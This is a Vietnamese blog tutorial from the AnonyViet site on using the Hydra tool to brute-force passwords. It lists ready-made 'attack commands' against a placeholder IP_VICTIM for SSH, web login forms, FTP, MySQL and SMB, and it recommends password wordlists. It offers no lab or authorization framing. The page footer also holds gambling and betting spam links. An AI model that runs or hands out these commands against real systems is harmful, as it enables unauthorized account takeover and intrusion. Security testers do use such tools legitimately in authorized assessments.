• Network
  • Security
  • Software
  • Thủ thuật
  • Tin tức
  • Video hướng dẫn
  • Donate – Mời AnonyViet ly Cafe ☕
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách dùng Hydra để Brute Force Password

AnonyViet by AnonyViet
in Basic Hacking
Reading Time: 4 mins read
A A
0

Mục lục bài viết

  1. Hydra là gì?
  2. Wordlist
    1. Username WordList:
    2. Password WordList
  3. Cách dùng Hydra để dò mật khẩu các dịch vụ mạng
    1. Brute Force SSH bằng Hydra
  4. Brute Force trang Login Website bằng Hydra
  5. Brute Force FTP
  6. Brute Force MYSQL
  7. Brute Force SMB

Hydra là gì?

Hydra là một trong những công cụ thường được Hacker và các nhà nghiên cứu bảo mật sử dụng. Đây công cụ có sẵn trong Kali Linux các phiên bản và được dùng để thực hiện các cuộc tấn công Brute Force Password hay còn gọi là dò mật khẩu.

Tham gia kênh Telegram của AnonyViet  👉 Link 👈

Trong bài viết này, mình sẽ chỉ cho bạn cách thực hiện một cuộc tấn công brute force với Hydra trên Máy chủ FTP, MYSQL, SMB, SMTP, SSH và Web Login Auth.

Các bài viết liên quan

Hydra: Cách tấn công Brute Force từ xa 2

Hydra: Cách tấn công Brute Force từ xa

26/11/2021
huong dan hack password wifi

Hướng dẫn dùng Aircrack-ng để Hack Password WiFi WPA/WPA2

18/07/2021
mot so cach hacker su dung chiem quyen tai khoan

Các cách tấn công của Hacker dùng để chiếm quyền tài khoản của bạn

03/04/2021
tấn công brute force là gì

Tấn công Brute Force là gì và Cách ngăn chặn

29/12/2020

Mình có bài phân tích về Brute Force và cách ngăn chặn rất chi tiết, nếu bạn muốn tìm hiểu sâu về phương thức này thì nên đọc kỹ bài này.

Wordlist

Khi tấn công Brute Force, bạn cần có sẵn 1 danh sách các ký tự dùng để dò đoán username và password. Bạn nên sử dụng WordList bộ Kaonashi hoặc bộ Worldlist do AnonyViet chia sẻ.

Username WordList:

Hydra cho phép bạn Brute Force cả username, nếu bạn không biết tên đăng nhập, bạn cũng có thể thử WorldList, để sử dụng Hydra tìm Username, bạn phải sửa đổi tham số -l user thành -L user.txt (user.txt là file chứa danh sách tên username dùng để dò mật khẩu).

Password WordList

Là danh sách các Password bạn sẽ dùng để đăng nhập thử vào trang Web hay SSH, FTP…., như đã nói ở trên mình thường dùng bộ Password WordList của AnonyViet sưu tầm.

Cách dùng Hydra để dò mật khẩu các dịch vụ mạng

Brute Force SSH bằng Hydra

Lệnh tấn công:

hydra -l user -P passwords.txt IP_VICTIM ssh

hoặc

hydra -L user.txt -P passwords.txt IP_VICTIM ssh

Brute Force SSH bằng Hydra

Brute Force trang Login Website bằng Hydra

Lệnh tấn công:

hydra -l user -p passwords.txt IP_VICTIM http-post-form '/path/login:username_field&password_field=^PASS^:wrong'

Thay thế /path/login:username_field&password_field= bằng đường dẫn và file đăng nhập trong link HTML

wrong: nếu từ này xuất hiện trên trang, thì mật khẩu chưa chính xác

Cách lấy Username Field và Password Field:

  • Username Field: mở Firefox nhấn F12 -> Network -> Send Login.
  • Password Field: mở Firefox nhấn Firefox F12 -> Network -> Send Login.

Hoặc bạn có thể dùng Burp Suite để bắt Request.

Brute Force trang Login Website

Brute Force FTP

Lệnh tấn công:

hydra -l user -P passwords.txt IP_VICTIM ftp

brute force ftp

Brute Force MYSQL

hydra -l user -P passwords.txt IP_VICTIM mysql

Brute Force MYSQL

Brute Force SMB

hydra -l user -P passwords.txt IP_VICTIM smb

Brute Force SMB

Trên Kali Linux cũng có Hydra phiên bản có giao diện, có thể sẽ dễ sử dụng hơn so với Hydra dòng lệnh để Brute Force, nhưng theo mình bạn nên tập thói quen dùng dòng lệnh để tập làm quen trên Linux và khi cài Hydra lên các hệ điều hành khác bạn có thể dễ dàng sử dụng. Hiện nay cũng có Hydra phiên bản Windows, nhưng mình chưa sử dụng, bạn nào dùng rồi thì comment bên dưới nha.

Bài viết đạt: 5/5 - (101 bình chọn)
Tags: brutebrute forceHydravét cạn
AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Các công cụ quét lỗ hổng bảo mật tốt nhất 3
Basic Hacking

Các công cụ quét lỗ hổng bảo mật tốt nhất

29/05/2023
Sự nguy hiểm của thư mục .git 4
Basic Hacking

Sự nguy hiểm của thư mục .git

26/05/2023
sqlmap nang cao
Basic Hacking

Cách sử dụng SQLMap nâng cao

01/05/2023
Demo tấn công Phishing với Evilginx2 và cách phòng tránh 5
Basic Hacking

Demo tấn công Phishing với Evilginx2 và cách phòng tránh

29/04/2023
Cách cài đặt và sử dụng Cobalt Strike dành cho Red Team 6
Basic Hacking

Cách cài đặt và sử dụng Cobalt Strike dành cho Red Team

20/04/2023
SEEKR: Bộ công cụ thu thập dữ liệu bằng OSINT 7
Basic Hacking

SEEKR: Bộ công cụ thu thập dữ liệu bằng OSINT

15/04/2023
Next Post
TREO MAY KIEM TIEN VOI Traffmonetizer

Hướng dẫn treo máy kiếm tiền bằng Traffmonetizer

Subscribe
Notify of
guest

guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

0 Comments
Inline Feedbacks
View all comments

Asia 300×600

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Shopee

Các bài mới

Cách tự tải và cài đặt Office 365 chính hãng 8

Cách tự tải và cài đặt Office 365 chính hãng

03/06/2023
Cách ghép mặt của bạn vào ảnh AI cực dễ 9

Cách ghép mặt của bạn vào ảnh AI cực dễ

03/06/2023
Cách luyện thi chứng chỉ Google Cloud miễn phí trên Whizlab 10

Cách luyện thi chứng chỉ Google Cloud miễn phí trên Whizlab

02/06/2023
Cách đăng ký tên miền .id.vn miễn phí trên iNet 11

Cách đăng ký tên miền .id.vn miễn phí trên iNet

01/06/2023
Tạo Video Animation cực thú vị với Artflow 12

Tạo Video Animation cực thú vị với Artflow

01/06/2023

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • AnonyViet trong Download CEH v12 Manual Lab – Giáo trình Hacker mũ trắng mới nhất
  • David trong Download CEH v12 Manual Lab – Giáo trình Hacker mũ trắng mới nhất
  • tran cong an trong Cách luyện thi chứng chỉ Google Cloud miễn phí trên Whizlab
  • AnonyViet trong Cách tự tải và cài đặt Office 365 chính hãng
  • khanh trong Cách tự tải và cài đặt Office 365 chính hãng

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ ku11net.co F8BET https://okuytin.com 6623 BK8 Goat 789betee.com ST666 khoaitv Iwin f8bet i9bet w388 jun88 https://7789bet.io/ https://j88casino.com/ 11bet keo nha cai vn88 Xoilac tv Trực tiếp bóng đá xoilac tv Bongdalu ae888

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ ku11net.co F8BET https://okuytin.com 6623 BK8 Goat 789betee.com ST666 khoaitv Iwin f8bet i9bet w388 jun88 https://7789bet.io/ https://j88casino.com/ 11bet keo nha cai vn88 Xoilac tv Trực tiếp bóng đá xoilac tv Bongdalu ae888

wpDiscuz
!

Ads

Ads Blocker Detected!!! - Vui lòng tắt Ad Blocker!!!

Vui lòng tắt Ad Blocker

Có vẻ như bạn đang bật trình chặn Quảng cáo.

{Trường hợp bạn đang dùng trình duyệt từ Facebook, hãy copy link bài viết qua Chrome để xem nội dung, như vậy sẽ không bị chặn}

Website chúng tôi duy trì nhờ vào doanh thu quảng cáo, vì vậy hãy tắt trình chặn quảng cáo để chúng tôi có kinh phí chi trả tiền thuê Server, xin cảm ơn!

Tải lại trang - Refresh Page